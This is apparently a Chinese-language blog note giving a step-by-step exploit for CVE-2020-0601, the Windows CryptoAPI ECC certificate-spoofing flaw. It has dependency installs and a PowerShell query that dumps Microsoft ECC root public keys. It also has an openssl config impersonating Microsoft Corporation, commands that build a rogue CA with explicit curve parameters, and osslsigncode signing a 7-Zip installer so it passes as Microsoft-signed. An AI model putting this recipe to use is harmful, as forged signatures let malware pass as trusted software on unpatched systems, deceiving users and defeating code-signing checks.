CVE-2020-0601 伪造签名笔记

安装依赖

1
2
3
4
5
pip3 install fastecdsa
pip3 install PyCryptodome
pip3 install --user gmpy2==2.1.0a2
apt install libmpc-dev
apt install osslsigncode

获取系统ecc加密的证书

1
2
3
4
5
6
7
8
9
dir Cert:\LocalMachine\root -Recurse|?{$_.FriendlyName -like "*ECC*"} |%{New-Object -TypeName psobject -Property @{
SerialNumber='0x'+$_.SerialNumber.tolower()
FriendlyName=$_.FriendlyName
publickey=[bitconverter]::tostring($_.publickey.encodedkeyvalue.rawdata).replace('-','').tolower()
publickeylen=[bitconverter]::tostring($_.publickey.encodedkeyvalue.rawdata).replace('-','').length
Subject=$_.Subject

}
} |Format-list
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
SerialNumber : 0x153875e1647ed1b047b4efaf41128245
publickeylen : 194
publickey : 04decdbb7020f12520b494e8d7b43b0f6e87ddabaccf4d402f81336b590918d6870d26239cb48d959d769fa5b90642e6ad36b2c4b3ae7a3c08d5cb9d3a5e45216c0be320f59bc2dd4433e342b9eaf2284292aafe0c07ca8a13993b6200eddaf335
FriendlyName : Microsoft ECC TS Root Certificate Authority 2018
Subject : CN=Microsoft ECC TS Root Certificate Authority 2018, O=Microsoft Corporation, L=Redmond, S=Washington, C
=US

SerialNumber : 0x14982666dc7ccd8f4053677bb999ec85
publickeylen : 194
publickey : 04c711162a761d568ebeb96265d4c3ceb4f0c330ec8f6dd76e39bcc849ababb8e34378d581065defc77d9fced6b39075de0cb090de23bac8d13e67e019a91b86311e5f342dee17fd15fb7e278a32a1eac98fc97e18cb2f3b2c487a7da6f40107ac
FriendlyName : Microsoft ECC Product Root Certificate Authority 2018
Subject : CN=Microsoft ECC Product Root Certificate Authority 2018, O=Microsoft Corporation, L=Redmond, S=Washingt
on, C=US

SerialNumber : 0x38623f7c7714c6aa4424574a882945ae
publickeylen : 194
publickey : 04d4ea1667c2960315edd21086c2c7904d88129154a0426d827d062f2cefd47c47469b16f3a8118a84aa11e11310a39c678bd15cde7a7bd51583ea4224be7b48585a0d9b016b35dff1756ce087c9bf305a9ea3c9c5868130bba3aadd9af1c40840
FriendlyName : Microsoft ECC Development Root Certificate Authority 2018
Subject : CN=Microsoft ECC Development Root Certificate Authority 2018, O=Microsoft Corporation, L=Redmond, S=Wash
ington, C=US

修改: openssl.cnf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[ req ]
prompt = no
distinguished_name = req_distinguished_name
x509_extensions = v3_req
[ req_distinguished_name ]
C = US
ST = Washington
L = Redmond
O = Microsoft Corporation
CN = Microsoft ECC Product Root Certificate Authority 2018
[v3_req]
subjectAltName = @alt_names
[alt_names]
DNS.1 = *.microsoft.com
1
openssl ecparam -name secp384r1 -genkey -noout -out p384-key.pem -param_enc explicit

修改gen-key.py publickey剔除开头的04

1
python3 gen-key.py

填入SerialNumber

1
openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -set_serial 0x14982666dc7ccd8f4053677bb999ec85
1
2
3
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem
openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr
openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf

生成 pkcs12并对文件进行签名

1
2
openssl pkcs12 -export -in client-cert.pem -inkey prime256v1-privkey.pem -certfile ca-rogue.pem -out cert.p12
osslsigncode sign -pkcs12 cert.p12 -n "Signed by wawa" -in 7z1900-x64.exe -out 7z1900-x64_signed.exe

效果

2020-01-17-19-33-15

感谢: zcgonvh & scanf 提供思路

gen-key
CVE-2020-0601